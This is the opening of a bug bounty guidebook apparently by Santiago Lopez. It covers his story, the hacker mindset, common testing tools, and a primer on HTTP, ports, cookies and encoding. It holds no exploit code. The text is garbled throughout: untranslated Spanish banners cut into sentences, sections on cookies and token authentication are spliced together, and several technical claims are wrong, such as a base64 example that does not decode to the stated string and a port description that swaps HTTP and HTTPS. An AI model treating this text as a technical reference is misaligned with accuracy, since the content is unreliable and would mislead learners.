SANTIAGO LOPEZ

MILLI O N A I R E
R ECORDS
BU G B OU N T Y
CHA NG E S Y OU R LI F E
AB O UT T HE A U THO R I hope my story motivates you to explore the world of bug bounty
and discover the hacker in you - you never know where your
Hi, I'm Santiago Lopez, an Argentinean hacker who, at the passion might take you!!
age of 19, achieved something that seemed impossible: to earn
a million dollars by finding and reporting software vulnerabili-
ties. It may sound like a Hollywood movie, but it is my reality.

My story began in my parents' humble basement, where an

old computer and an unstable internet connection became my
gateway to a fascinating world: the world of hacking. From a young
age, I was drawn to technology and the challenges it presented.
I would take apart electronics just to see how they worked and
spend hours reading about programming and computer security.

When I was 16, I discovered the concept of "bug

bounties," programs in which companies reward hackers
who find vulnerabilities in their systems. I thought it was
an amazing idea: I could use my skills to help improve
internet security and earn money at the same time!

I started participating in bug bounty platforms, such as

HackerOne, and soon discovered that I had a natural talent for
finding vulnerabilities. I spent hours analyzing code, looking for
patterns and trying different hacking techniques. It wasn't easy,
there were many moments of frustration and sleepless nights,
but the thrill of finding a critical bug and the satisfaction of
knowing that I was helping to protect people kept me motivated.

Eventually, my efforts began to pay off. I found vulnerabili-

ties in big-name companies like Verizon, Twitter and Automattic
(the company behind WordPress). The rewards kept piling up, and
in 2019, I reached the historic milestone of $1 million in earnings.

This achievement not only changed my life financially, but

also opened doors to a world of opportunities. I've traveled the
world, spoken at IT security events, and met amazing people
who share my passion for technology and security.

Today, I still work as a white hat hacker, finding and reporting

vulnerabilities to help companies protect their systems and their
users. But I also want to share my experience and knowledge with
others. That's why I wrote this book, to inspire other young peo-
ple to follow their passions and prove that, with dedication and
perseverance, they can achieve anything they set their minds to.

2 MILLIONAIRE RECORDS
F OR EW O R D
When I met Santiago Lopez, I was impressed by his pas-
sion for computer security and his innate ability to find vul-
nerabilities in software. But what really surprised me was his
story: a young man from humble beginnings who, through his
talent and dedication, managed to become a millionaire hacker.

Santiago is an inspiring example of how curiosity, per-

severance and the desire to learn can open doors you never
imagined. His story proves that you don't need a college
degree or years of experience to succeed in the world of
cybersecurity. What you do need is an inquisitive mind,
an unwavering will and the ability to think outside the box.

In this book, Santiago shares his journey from his

parents' basement to the top of the bug bounty world. He
takes us through the ups and downs of his career, sha-
ring his experiences, his lessons learned and his practi-
cal advice for those who want to follow in his footsteps.

But this book is much more than just a technical guide.

It is an invitation to explore the mindset of a hacker, to see
the digital world with new eyes and to discover the poten-
tial hidden in every line of code. Santiago shows us that
hacking is not just a skill, but a way of thinking, a way of life.

Whether you are a student, an IT professional or just

someone curious about the world of cybersecurity, this
book will captivate and inspire you. Santiago will guide you
through the fundamental concepts of bug bounty, teach
you the most effective tools and techniques, and show
you how to turn your passion into a successful career.

Get ready to embark on an exciting journey through the

world of hacking from one of the most talented and successful
hackers of our time, open this book and discover the hacker in you!

Maurice Flores, CEO of TheCute LLC

 3
4 MILLIONAIRE RECORDS
INTRODUCTION
 Get ready to dive into the exciting
world of bug bounty, where ethical hackers
become millionaires.

In this book, I will guide you through the basics of cyber-

security and reveal the techniques and strategies that allowed
me to earn more than a million dollars by finding and reporting
software vulnerabilities.

Together, we will explore different types of web vulne-

rabilities, from the most common ones, such as SQL injection
and Cross-Site Scripting (XSS), to the most advanced ones, like
exploit chains and desertification attacks. You will learn to iden-
tify them, exploit them and, most importantly, prevent them.

I will teach you how to use the essential tools and techni-
ques of ethical hacking, from vulnerability scanners to manual
exploitation techniques. You will learn how to analyze source
code, perform penetration tests, and use debugging tools to
find and fix security errors.

But this book is not just about techniques and tools. We’ll
also explore a hacker’s mindset, that insatiable curiosity and that
passion for troubleshooting that drives us to look for vulnera-
bilities where others don’t see them. You will learn to think like
an attacker, anticipate his moves and build stronger defenses.

In addition, I will guide you through the world of bug bounty

programs, where you can put your skills into practice and earn
rewards for finding vulnerabilities. I’ll show you how to find
programs that suit your level of experience, how to communi-
cate effectively with and how to build a successful career as a
reward hunter.

Whether you’re a curious beginner or an experienced IT

security professional, this book will provide you with the tools
and knowledge you need to become a bug bounty expert. Get
ready to embark on an exciting adventure and discover the
hacker you carry inside!

6 MILLIONAIRE RECORDS
F OR W H O M I S T HI S This book is written thinking about you, who are curious
about the world of cybersecurity but have no prior experience.

B OOK? Maybe you’ve heard about the bug bounty and you’re intrigued by
the idea of making money by finding software vulnerabilities, but
you don’t know where to start. Or maybe you're a tech enthusiast
looking for a way to use your skills to generate online revenue.

If you identify with any of these situations, this book is

for you!

You don't need to be an IT expert to get started on the bug

bounty. In fact, I myself started without any university degrees
or work experience in the field. All you need is curiosity, a desire
to learn and perseverance.

In this book, I will guide you step by step through the fun-
damentals of bug bounty, from the basics of web security to the
most advanced techniques of ethical hacking. I will teach you
how to find vulnerabilities, how to report them responsibly and
how to maximize your profits.

It doesn’t matter if you’re a student, an employee or just

someone looking for a new opportunity. The bug bounty is a fle-
xible activity that you can do from anywhere in the world and
at your own time.

With this book, you will discover that bug bounty is not only
a way to make money, but also a way of learning, growing and
making a difference in the digital world. I'll show you how to turn
your passion for technology into an exciting and lucrative career.

So, if you're ready to embark on this adventure, open this

book and discover the hacker you carry inside!

WHAT WILL YOU FIND IN THIS BOOK?

YOU WILL DISCOVER A COMPLETE GUIDE TO BECOMING A SUCCESSFUL BUG REWARD
HUNTER.

I ntroduction 7
WH AT W I L L Y O U FI ND IN This book will guide you through an exciting journey through
the world of bug bounty, from the basics to the most advan-

THI S B O O K ? ced techniques, so you can turn your passion for techno-
logy into a lucrative and rewarding career.

Part I: Bug Bounty Fundamentals

• Chapter 1: Introduction: Discover the story of

Santiago López, the millionaire hacker, and how the
bug bounty can change your life. Learn what bug bounty
is and why it is a unique opportunity to make money
doing what you love.
• Chapter 2: Hacker Mentality: Immerse yourself in
a hacker's mind and learn to think creatively and find
vulnerabilities that others overlook. Develop the cri-
tical thinking and problem-solving skills that will turn
you into a successful reward hunter.
• Chapter 3: Essential Tools and Techniques: Get
acquainted with the most important tools and techni-
ques used by reward hunters, from vulnerability scan-
ners to manual exploitation techniques. Learn how to
use them effectively to find and report vulnerabilities.

Part II: Web Vulnerabilities

• Chapter 4: SQL Injection: Learn how attackers can

inject malicious SQL code into a web application and
how to protect yourself against this type of attack.
• Chapter 5: Cross-Site Scripting (XSS): Explore the
different types of XSS (reflected, stored, and DOM-
based) and learn how to prevent them. Learn how
attackers can use XSS to steal data or take control of
user accounts.
• Chapter 6: Open Redirects: Learn to identify diffe-
rent types of Open Redirects, from the simplest to the
most sophisticated, and discover how attackers can
hide their intentions behind seemingly harmless links.
• Chapter 7: Clickjacking: The art of deceiving your
clicks. You will learn how attackers manipulate web
interfaces to get you to click where they want, and
how you can protect yourself from this invisible threat.
• Chapter 8: Cross-Site Request Forgery (CSRF): Learn
how attackers can trick users into performing unwan-
ted actions in a web application and how to protect
yourself against CSRF.
FE LIZ HA CK ING ! • Chapter 9: IDOR: The negligence that can cost expen-
ENCONTRARÁS UN MENSAJE FINAL DE ALIENTO Y MOTIVACIÓN PARA EMBARCARTE EN TU sive. You will learn how hackers take advantage of
AVENTURA EN EL MUNDO DEL BUG BOUNTY.
data access errors to see information they should
not, and how to prevent this from happening in your

8 MILLIONAIRE RECORDS
 applications.
• Chapter 10: Race Conditions: When speed becomes
a problem. You will learn how hackers exploit time and
synchronization to damage applications, and how to
design your systems to prevent these attacks.
• Chapter 11: SSRF: The server as involuntary accom-
plice. You will learn how hackers manipulate server
requests to access internal or external resources, and
how to shield your applications against this type of
attack.
• Chapter 12: Insecure Deserialization: The resurgence
of malicious objects. You will learn how hackers mani-
pulate serialized data to run unauthorized code on
your server, and how to protect your applications from
this threat.
• Chapter 13: XXE: The back door in your XML files.
You will learn how hackers exploit XML processing to
access files and system resources, and how to secure
your applications against this type of attack.
• Chapter 14: Template Injection: When templates
become weapons. You will learn how hackers mani-
pulate web templates to run malicious code on your
server, and how to protect your applications from this
dangerous vulnerability.
• Chapter 15: Application Logic Errors: The software
works, but not as it should. You will learn to identify
hidden bugs in the logic of applications that can be
exploited by attackers, and how to design more secure
and robust software.
• Chapter 16: Broken Access Control (BAC): When doors
are opened in pairs. You will learn how attackers take
advantage of access control bugs to access sensitive
information or perform unauthorized actions, and how
to secure your apps to avoid it.
• Chapter 17: Directory Traversal: Escaping Directory
Prison. You will learn how hackers move freely through
your server’s file system, accessing sensitive informa-
tion, and how to prevent them from escaping permi-
tted limits.
• Chapter 18: RCE: Remote control of your server. You
will learn how hackers take full control of your server,
running their own code to steal data or cause damage,
and how to protect you from this critical threat.
• Chapter 19: Same-Origin Policy Bugs: when web bou-
ndaries are blurred. You will learn how hackers bypass
security restrictions between websites to steal data or
undertake unauthorized actions, and how to streng-
then your defenses to keep your data safe.
• Chapter 20: SSO: a master key with hidden risks. You
will learn how hackers can exploit vulnerabilities in
single login to access multiple accounts and data, and
how to protect your systems from this threat.
• Chapter 21: Information Disclosure: The Secrets
Revealed. You will learn how hackers uncover sensitive
information that should not be public, from user data
to technical details of the application, and how to pre-
vent your systems from filtering valuable information.
Part III: Beyond Technic
• Chapter 22: Bug Bounty Programs: Immerse yourself
in the world of bug bounty programs and learn how
to find and participate in them. Discover tips and tri-
cks to maximize your earnings and build a successful
career as a reward hunter.
• Chapter 23: Responsible Communication and
Disclosure: Learn to report vulnerabilities responsibly
to companies and how to work with them to solve pro-
blems. Discover the importance of responsible disclo-
sure and how it can benefit both hackers and.
• Chapter 24: Building a Bug Bounty Career: Get prac-
tical tips from Santiago López on how to turn your pas-
sion for security into a successful career. Learn how
to develop your skills, build your reputation and find
opportunities in the job market.
• Chapter 25: The Future of Bug Bounty: Explore
emerging trends in the world of bug bounty and dis-
cover how you can prepare for the future of this exci-
ting industry.
Part IV: Hands to work
• Chapter 26: Choosing a Bug Bounty Program: You
will learn how to select the bug bounty programs that
best suit your skills, goals and preferences, maximizing
your chances of success and reward.
• Chapter 27: History of Industry: You will learn about
the evolution of this practice from its beginnings to
the present. You will learn how the early error reward
programs laid the foundations for today’s industry,
and how it has grown and professionalized over time.
• Chapter 28: Asset types: You will be able to understand
the different types of systems, applications and plat-
forms that become targets of error reward programs.
• Chapter 29: Platforms: You will learn about the major
platforms that connect security researchers with
companies seeking to identify security issues in their
I ntroduction 9
 systems.
• Chapter 30: Scope, Payments and Response Times:
You will learn how to interpret the terms and condi-
tions of failure reward programs, what vulnerabilities
qualify for reward, how payments are made, and how
long you can wait in response to your reports.
• Chapter 31: Private programs: You will learn about
bug bounty programs that are not open to the gene-
ral public, but are exclusive to a selected group of
security researchers.
• Chapter 32: The right program: You will learn to define
your goals and preferences as a bug bounty researcher,
and to use that information to select the programs that
best align with them.
• Chapter 33: A Good Report: You will learn to communi-
cate your findings in a clear, concise and effective way.
• Chapter 34: Build a relationship: You will learn how to
build strong and lasting relationships with companies
that offer bug bounty programs.
• Chapter 35: Why are you failing?: You will learn to iden-
tify and overcome the most common obstacles facing
bug bounty researchers. Discover how to analyze your
own errors, learn from them, and improve your vulne-
rability search and reporting strategies.
• Chapter 36: What to do when you're stuck?: You will
learn how to overcome creative and technical blocks
that may arise during the search for vulnerabilities

With this book, you will have all the tools you need to
become a bug bounty expert and start making money by pro-
tecting and users from cybercriminals. Prepare for an exciting
and challenging adventure!

10 MILLIONAIRE RECORDS
I ntroduction 11
H AP P Y HA C K I NG !
Now that you have in your hands the tools and knowle-
dge that led me to earn a million dollars, it's your turn to go out
into the world and leave your mark in the bug bounty universe.

If you commit to learning, practicing and applying the stra-

tegies I have shared with you, I assure you that the chances of
transforming your life and achieving financial success are enor-
mous. Bug bounty is a growing industry, and are willing to pay
generously to protect their systems.

But remember, power entails a great deal of responsibility.

The knowledge you have acquired in this book can be used for
good or for evil. I urge you to use your skills ethically and res-
ponsibly, always respecting the privacy and safety of others.

The bug bounty is a community of people passionate about

technology and security. Join forums, participate in events and
share your knowledge with others. Together, we can make the
Internet a safer place for everyone.

So go ahead, get out there and start your adventure! I'm

sure you'll great things.

Important reminder: The content of this book is intended

solely for educational and research purposes. The misuse of the
information presented here is illegal and may have serious legal
consequences. Hake responsibly!

12 MILLIONAIRE RECORDS
I ntroduction 13
 C H A P T E R O N E

BUG BOUNTY'S
FUNDAMENTALS
1
SA N T I 'S P ATH My Way to the Million Dollars (and How You Can Do The Same)

Hi, I'm Santiago López, and they call me the "millionaire

hacker." Not because I stole a bank (that would be illegal!), but
because I earned more than a million dollars by finding and
reporting software vulnerabilities through bug bounty programs.

At the age of 19, I achieved a historic achievement: I became

the world's first millionaire hacker. This milestone not only marked
a highlight in my personal career, but also highlighted the impor-
tance of bug bounty as a key tool for cybersecurity.

Does that sound too good to be true? Believe me, I know

it looks like it. When I started in this world, I was a curious tee-
nager with an old computer and a slow internet connection. I
never imagined that my passion for technology and troubleshoo-
ting would lead me to travel around the world, meet amazing
people and, yes, make a fortune.

But here I am, and I want to share my story with you. I want
to show you that bug bounty is not just a way to make a living,
but an exciting adventure that allows you to use your skills to
make the digital world a safer place.

In this book, I'll take you by hand through my journey. I'll

tell you how I discovered the bug bounty, how I learned the tools
and techniques needed to find vulnerabilities, and how I over-
came the challenges and obstacles I encountered along the way.

But this is not just an autobiography. My goal is to give you

the tools and knowledge you need to follow in my footsteps.
I'll teach you how to think like a hacker, how to find vulnerabili-
ties that others overlook, and how to effectively communicate
your findings to.

Whether you are a student, a computer professional or just

a technology enthusiast, this book is for you. If you have curio-
sity, perseverance and a passion for troubleshooting, you can
become a successful reward hunter.

Are you ready to embark on this adventure with me? ¡We

move to the next page!

I still remember how I found my first bug. At that time, I

MENTAL ID A D D EL H A CK ER M I L L O N AR I O
DESCUBRIRÁS LAS CLAVES PARA DESARROLLAR UNA MENTALIDAD ENFOCADA EN EL
CRECIMIENTO, LA PERSEVERANCIA Y LA RESOLUCIÓN CREATIVA DE PROBLEMAS.
spent a lot of time trying to hack small that didn’t offer a reward
in their software. My first target was Ebay; this company was
launching its new bug reward program and allowed it to report
vulnerabilities by email. You would not receive a reward, but you
would be presented with a "thank you" page once you report

18 MILLIONAIRE RECORDS
a valid error.
My first error was a very simple CSRF that allowed you to
edit your Ebay account information through a link. As I said, I did
not receive any rewards, but I had the opportunity to show my
parents my achievement. Which I love to this day.
Welcome to my world. My main goal today is to show you
how I, Santiago Lopez, transformed my passion for technology
and cybersecurity into an extraordinary journey that led to ear-
ning over a million dollars at the age of 19.
As you read these chapters, I encourage you to approach
the material with an open mind and a willingness to learn. The
world of insect rewards is dynamic and always evolving, offering
endless opportunities for those willing to take advantage of them.
Thank you for joining me on this journey. I hope this book
will not only equip you with the skills to succeed in bug rewards,
but also inspire you to pursue your passions and realize your full
potential. We climb into the exciting world of ethical hacking
and discover how you too can turn your skills into meaningful
achievements.

As someone who started from a humble start, my goal with

this book is to demystify the process of rewarding mistakes
and share the strategies, techniques and mentality that helped
me success. Whether you’re a newcomer curious about ethical
hacking or an experienced professional looking to perfect your
skills, this book provides valuable insights and practical tips to
guide you along your path.

On the following pages, you will find a comprehensive

guide that covers everything from the basics of error rewards to
advanced techniques for identifying and reporting vulnerabili-
ties. I will guide you through the essential tools, methodologies
and platforms that have been crucial to my success. In addition,
I will share anecdotes and personal experiences that highlight
the challenges and triumphs I have faced along the way.

One of the unique aspects of this book is its emphasis on

the holistic approach to becoming a successful ethical hacker.
It’s not just about technical skills; it’s also about developing the
right mindset, building effective habits, and understanding the
motivations that drive true success. I believe that anyone, regar-
dless of their origin or their starting point, can extraordinary
results with the right direction and determination.

This book is divided into several modules, each designed

to build on the previous one, ensuring a structured and com-
prehensive learning experience. You will learn how to browse
error reward platforms like HackerOne, master the art of vulne-
rability hunting, and understand the nuances of reporting errors
effectively. At the end of this book, you will have the knowledge
and confidence to embark on your own journey into the insect
reward ecosystem.

bug bounty ' s F undamentals 19

MIL LI ON A R I E HA C K E R You're not born a hacker, you're done. It is not a question
of having an intellectual coefficient of genius, but of cultivating

ME N TAL I T Y a particular way of thinking, a mindset that questions, explores,

and seeks creative solutions to complex problems. In this chap-
ter, I’ll invite you to immerse yourself in a hacker’s mind, see the
digital world through a different lens, and discover how this uni-
que perspective can turn you into a successful reward hunter.

What's the Hacker Mentality?

The hacker mindset is not about breaking things for fun or

causing harm. It's about curiosity, ingenuity, and an inexhausti-
ble passion for understanding how things work. Hackers see the
world as a giant puzzle, full of secrets to discover and challen-
ges to overcome.

This mentality is based on several key principles:

• Insatiable Curiosity: Hackers have an insatiable thirst

for knowledge. They want to understand how things
work, why they work that way, and how they could
work otherwise. This curiosity drives them to cons-
tantly explore, experience and learn.

• Lateral Thinking: Hackers are not limited to following

established rules. They look for creative and unusual
solutions to problems. They are not afraid to question
the status quo and propose new ideas.

• Persistence: Hackers don't give up easily. When they

face a challenge, they keep trying until they find a solu-
tion. They understand that failure is part of the lear-
ning process and use it as an opportunity to improve.

• Open Mentality: Hackers are open to new ideas and

perspectives. They do not stick to their own beliefs and
are willing to change their minds if convincing evidence
is presented to them.

• Collaboration: Hackers believe in the power of the

community. They share their knowledge and experience
with others, and learn from others. They understand
that together they can more than alone.

HE RRA M IENTAS Y T ÉCNICAS E S E N C I AL E S

DESCUBRIRÁS LAS HERRAMIENTAS Y METODOLOGÍAS FUNDAMENTALES QUE UTILIZAN
LOS EXPERTOS EN BUG BOUNTY PARA ENCONTRAR VULNERABILIDADES DE MANERA
EFICIENTE.

20 MILLIONAIRE RECORDS
 How to Develop a Hacker Mentality

Developing a hacker mindset is not something that happens

overnight. It requires time, effort and dedication. But with prac-
tice, you can train your mind to think like a hacker. Here are some
tips to get started:

• Question everything: Don't accept things as they

are. Ask yourself why things work in a certain way and
if they could work otherwise.
• Experiment: Don’t be afraid to try new things and
experiment with different approaches. Trial and error
is an important part of the learning process.
• Learn from others: Join online hacking communities,
attend conferences and workshops, and read books
and articles about cybersecurity.
• Share your knowledge: Help other hackers and learn
from their experiences.
• Don't give up: Persistence is key. Don't be discoura-
ged by failures, learn from them and move on.

The Hacker Mentality on Bug Bounty

The hacker mindset is essential for success in the bug

bounty. It allows you to view web applications and systems
from an attacker's perspective, identify vulnerabilities that others
overlook, and develop creative exploits.

By adopting this mindset, you will become a valuable asset

for any bug bounty program. You can help improve the security
of their products and services, protect users from cybercriminals
and, of course, earn significant rewards for your efforts.

The hacker mindset is a powerful tool that can open the

doors to a world of opportunities. Whether you want to become
a professional reward hunter, improve your cybersecurity skills,
or simply better understand how the digital world works, cul-
tivating this mentality will give you an invaluable advantage.

So, are you ready to start thinking like a hacker? The jour-
ney begins now!

bug bounty ' s F undamentals 21

ES S EN T I A L T O O L S A ND A good hacker is like a detective: he needs the right tools
to solve the case. In the world of bug bounty, these tools range

TE CH N I Q U E S from sophisticated automated scanners to the most refined

manual skills. In this chapter, I will introduce you to the essen-
tial arsenal that every reward hunter must master to successfully
find and exploit vulnerabilities.

Vulnerability Scanners

Vulnerability scanners are automated tools that analyze web

applications and systems for potential vulnerabilities. They're like
digital bugs that smell code in search of patterns that indicate
the presence of known vulnerabilities.

Some of the most popular and effective scanners include:

• Burp Suite: A complete set of tools to test the security

of web applications. It includes an interceptor proxy,
a vulnerability scanner, a request repeater and many
other useful tools.
• OWASP ZAP: An open source vulnerability scan-
ner specifically designed to find security issues in web
applications.
• Nessus: A network vulnerability scanner that can
identify a wide range of vulnerabilities in systems and
applications.
• Nikto: An open source web vulnerability scanner
that searches for a variety of common issues, such as
configuration errors, default files and directories, and
known vulnerabilities.

While vulnerability scanners are a valuable tool, it is impor-

tant to remember that they are not infallible. More subtle or com-
plex vulnerabilities can be overlooked, so it is crucial to comple-
ment their use with manual testing.

Manual Exploitation Techniques: The Art of Hacking

Manual exploitation techniques are the true heart of hacking.

They involve using technical skills and knowledge to manipulate
a web application or system and exploit its vulnerabilities.

Some of the most common techniques include:

• Code Injection: Code injection is a technique in

C ÓMO FU NCIO NA INT ER NET
APRENDERÁS LOS FUNDAMENTOS BÁSICOS DE LA RED GLOBAL, DESDE LOS PROTOCOLOS
DE COMUNICACIÓN HASTA LA ESTRUCTURA DE DIRECCIONES IP Y DOMINIOS.
which an attacker inserts malicious code into a web
application, which is then run by the application. There
are different types of injection of code, such as SQL,
command, and template injections.

22 MILLIONAIRE RECORDS
 • Fuzzing:Fuzzing is a technique that consists of sen-
ding random or unexpected data to an application to
see how it reacts. If the application gets locked or beha-
ves unexpectedly, it can be a sign of a vulnerability.
• Social Engineering: Social engineering is the art of
manipulating people to disclose confidential informa-
tion or take actions that benefit the attacker. In the
context of bug bounty, social engineering can be used
to gain access to restricted systems or to collect infor-
mation about vulnerabilities.
• Source Code Analysis: Source code analysis invol-
ves examining the code of an application to identify
vulnerabilities. This technique requires a deep knowle-
dge of programming languages and security practices.

Other Essential Tools

In addition to vulnerability scanners and manual exploita-

tion techniques, there are other tools that every reward hunter
should have in his arsenal:

• Proxy Interceptor: A proxy interceptor, such as

Burp Suite, allows you to intercept and modify traf-
fic between your browser and the web server. This
is useful for analysing HTTP requests and responses,
modifying parameters, and testing different payloads.
• Web scanner: A web scanner, such as the Chrome
or Firefox development tools, allows you to examine
the HTML, CSS, and JavaScript code of a web page, as
well as network requests and responses. This is useful
to identify client-side vulnerabilities, such as Cross-
Site Scripting (XSS).
• Command Line Tools: Command line tools, such as curl,
wget, and nmap, are essential for conducting security
testing from the terminal.
• Virtual Machine: A virtual machine allows you to
create an isolated environment to test web applications
and systems without compromising your main system.

bug bounty ' s F undamentals 23

24 MILLIONAIRE RECORDS
1. 1 - H O W I NT E R NE T
WOR KS # 1 . 1
Let's take a moment to learn how the Internet works before
we go hunting bugs. Exploiting the weaknesses of this techno-
logy is at the heart of searching for web vulnerabilities, so expe-
rienced hackers should be well versed in it. You can proceed with
my explanation of Internet security safeguards if you are already
familiar with these procedures.
A good starting point is to wonder what happens in your
browser when you type www.google.com. In other words, how
does your browser determine how to navigate from a domain
name like google.com to the desired web page? Let's investigate it.
Client-Server Model
Clients and servers are the two types of equipment that
make up the Internet. Resources and services are requested by
customers and supplied by servers. Your browser works like a
client that requests a web page to a web server when you visit a
web site. The browser then receives the web page of the server.
web pages. Applications can request data from other systems
through web APIs. This enables applications to communicate
with each other and exchange resources and data in a mana-
ged way. Through Twitter APIs, for example, other websites can
send requests to Twitter servers to receive information such as
lists of tweets that are public and the people who have written
them. Beyond this, many other features of the Internet are fed
by APIs; we will talk about them and their security issues.
Domain Name System
How do other browsers and yours know where to look for
these resources? Each device connected to the Internet has
its own Internet Protocol (IP) address that other devices can
use to locate it. However, IP addresses are composed of cha-
racters and numbers that are difficult to remember. The IPv4
address format, for example, is older and has this appearance
164.72.240.213. IPv6, the latest version, seems rather more
intricate: fd2f:0c63:bc9c::/48.
The Domain Name System (DNS) is useful in this situation.
Converting domain names to IP addresses,

A web page is a set of files or resources uploaded by the

web server. For example, the server will send to your browser at
least a text file written in HTML (Hypertext Markup Language),
which tells your browser what to display. The DNS server acts as the Internet equivalent of a phone
book.
To enhance its appearance, most web pages now incorpo-
rate cascading style sheets (CSS). Web pages can also include
JavaScript (JS) files, which allow websites to respond to user
entries and animate the page without the need for a server.
JavaScript, for example, can evaluate user entries on the client
side before transmitting them to the server and resize images
as users move around the page.

Last but not least, embedded features, such as images and

videos, can appear in your browser. The web page you are viewing
is the result of the combination of these features in your browser.
Servers offer users more than just giving them access to

bug bounty ' s F undamentals 25

 Internet ports
Your browser will try to establish a port-based connection
to the IP address once you have determined the appropriate
address. On devices, a port is a logical division that designates
a specific network service. Port numbers, which can range from
0 to 65,535, are used to identify ports.
Ports can be used by a server to provide multiple services
to the Internet simultaneously. Port numbers also allow the ser-
ver to effectively transfer incoming messages from the Internet
to the appropriate service for their processing, as there are pro-
tocols for the traffic received in specific ports. For example, the
web server recognizes that a client connecting to port 80 wants
to access its web services.
For HTTPS, the encrypted version of HTTP, we use port
443, while by default port 80 is used for HTTPs.
Requests and answers HTTP
Once the connection is established, the browser and the ser-
ver use the Hypertext Transfer Protocol (HTTP) to communicate.
HTTP is a set of guidelines that describe the format and meaning
of messages sent over the Internet, as well as the information
exchange protocols that web servers and clients should follow.
The browser sends a HTTP request to a server whenever
you want to communicate with it. The two most popular forms
of HTTP requests are GET and POST, although there are also
other varieties. POST requests send data to the server, while
GET requests usually receive data from it. Other popular HTTP
methods are PUT, which is used for updating resources, DELETE,
that is used to remove resources, and OPTIONS, which are used
to request permitted HTTPS methods for a specific URL.
26 MILLIONAIRE RECORDS
This is an example of a GET request that consults the goo-
gle.com home page on the server.
-----------------------------------------------------------
GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0
Accept: text/html, application/xhtml+xml, application/xml
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------
Since you will encounter many of these requests throughout
this book, we will review its format. Each HTTP request con-
sists of a request line, request headers and an optional request
body. The request line and headers are all that is present in the
previous example.
The first line of a HTTP request is known as the request
line. Details the requested URL, the HTTP version used and the
request method. Here it can be noted that the client is using
HTTP version 1.1 to send a GET request to the homepage www.
google.com.
The headers of the HTTP request make up the remaining
lines. They are used to provide the server with more details about
the request. This allows the server to customize the client's
results. The request's host name is specified in the Host header
in the previous example. The operating system and version of
the requesting software, including the user's web browser, are
listed in the User-Agent header. The Accept, Accept-Language,
and Accepts-Encoding headers inform the server of the format
of the replies. In addition, the Connection header tells the ser-
ver whether or not to maintain the network connection once
the server has responded.
Some more standard headers may appear in requests.
Cookies are sent from the client to the server through the
Cookie header. The address of the previous web page that you
linked to the current page is specified in the Reference header.
Additionally, credentials for user authentication on a server are
included in the Authorization header. The server will attempt to
satisfy the request as soon as it is received. Through HTTP res-
ponses, the server will return all the resources needed to create
your web page. A HTTP response has several components: the
body of the HTTPS response, which is the actual web content
you have requested; a HTTPs status code to show whether the
request has been performed correctly; and HTTS headers, which
are the 37 bits of authentication information, content format,
and security policies that browsers and servers use to commu-
nicate with each other. The content of the website may consist
of graphics, JavaScript code, CSS style sheets, HTML code, etc.
Here is an example of HTTP response:
HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
Content-Length: 88
Content-Type: text/html
Connection: Closed
<html> <body> <h1>Hello, World!</h1> </body > </html>
Check the message 200 OK of the line
A valid request is indicated by a HTTP status code in range
200. A status code in range 300 denotes a page redirection. A
state code in the range 300 denotes a page redirection, while a
code at the range 400 denotes an error from the client, such as
a request from a page that does not exist. The range 500 indi-
cates an error that has occurred on the server.
As a bug hunter, you should always keep an eye on these
status codes, as they provide valuable information about server
functionality. A 403 status code, for example, indicates that you
are not allowed to use the resource. Esto podría implicar que, si
puedes superar los límites de acceso, hay información sensible
enterrada en el sitio web.
HTTP response headers are the following line of the answer,
divided by two points (:). They allow the server to provide the
client with more information about the response. En este caso,
es evidente que la respuesta se recibió el martes 31 de agosto
de 2021, a las 17:38:14 GMT 2. The body file type of the answer
is specified by the Content-Type header. In this case, the con-
tent type of the page is text/html 3. Google Web Server (gws)
4 es la versión del servidor, y 190.532 bytes es la longitud del
contenido 5. The format, language and security restrictions of
the material are usually specified in additional response headers.
In addition to these, you may encounter some other typi-
cal response heads. To set a cookie, the server sends the Set-
Cookie header to the client. The URL to which the page should
bug bounty ' s F undamentals
be redirected is indicated in the Location header. The sources
to which access to the content of the page is allowed are indi-
cated in the Access-Control-Allow-Origin header.
The X-Frame-Options header indicates whether the page
can be loaded within an iframe, while Content-Security-Policy
regulates the source of the resources that the browser can load.
The body of the answer is the data that follows the blank
line. Includes the HTML and JavaScript code that shapes the
actual content of the page. Your browser will render it all for
you once you have all the data needed to create the web page.
Internet security checks
After you have acquired a general understanding of how
information is shared online, we will discuss some essential
security measures that keep hackers out. First you need to
understand how these controls work because finding errors
often requires you to design inventive ways around them.
Content Encoding
It is not always the case that data sent through HTTP
requests and responses are sent as simple text. Websites often
use various encryption techniques to protect their messages
from data corruption.
Binary data can be successfully transferred between machi-
nes with different levels of support for different types of content
through data encoding. Common characters that are not used
as controlled characters in Internet protocols are used for enco-
ding. So you can be sure that your data will reach your destina-
tion without damage when encoding information using standard
encryption algorithms. On the other hand, if you transfer your
data in its original format, Internet protocols may misread specific
characters in the message, which could cause data corruption.
Codification Base64 is one of the most common ways to
encode data. It is often used to carry images and encrypted
information within web messages. This is the base64 encoded
version of the "Content Encoding" string
------------
VEhJUyBJUyBBIFRFU1Q=
------------
27
 The character set used in Base64 encoding consists of the
following: the characters A to Z in the main alphabet, the charac-
ters a to z in the lower alphabet, the numbers 0 to 9, the num-
bers + and /, and finally the = for padding. A modified variant of
base64 called base64url encoding is used for URL formatting.
Similar to base64, but without padding and using a different set
of non-alphanumeric characters.
URL encoding
This is how the server recognizes you! The server will track
the cookie created during the session and use it to verify your
identity. Ultimately, the server will disable the session cookie
when you log out, making it unusable.
The server will generate a new session and an accompanying
session cookie for you the next time you connect.

URLs can only be sent over the Internet using the ASCII
character set. If a URL contains characters outside the ASCII
character set, the URL must be converted.

• URL encoding converts non-ASCII characters into a

format that can be transmitted over the Internet.

• The URL encoding replaces non-ASCII characters with

a "%" followed by hexadecimal digits.

• URLs cannot contain spaces. URL encoding normally

replaces a space with a plus sign (+), or %20.
URL-encoded equivalent using a URL calculator such as URL
Decode and Encode (https://www.urlencoder.org/).
Token-based authentication
HTTP cookies and session management
Token-based authentication is a security method used to
Why is it that every time you close the email tab, you don't verify a user's identity on websites, applications and APIs. It
need to log in again? It is because your session is remembered works like a digital key that grants access after a login. Here is
by the website. By using session management, the server can a breakdown:
respond to multiple requests from the same user without having
to log in again. Process:

Each user accessing a web site creates and maintains a ses-
sion, and this process is initiated when you log in. Your browser
will receive an associated session ID from the server, which acts
as identification documentation.
Usually, the session ID is a long random string that is diffi-
cult to find out. The server logs you out and deletes the session
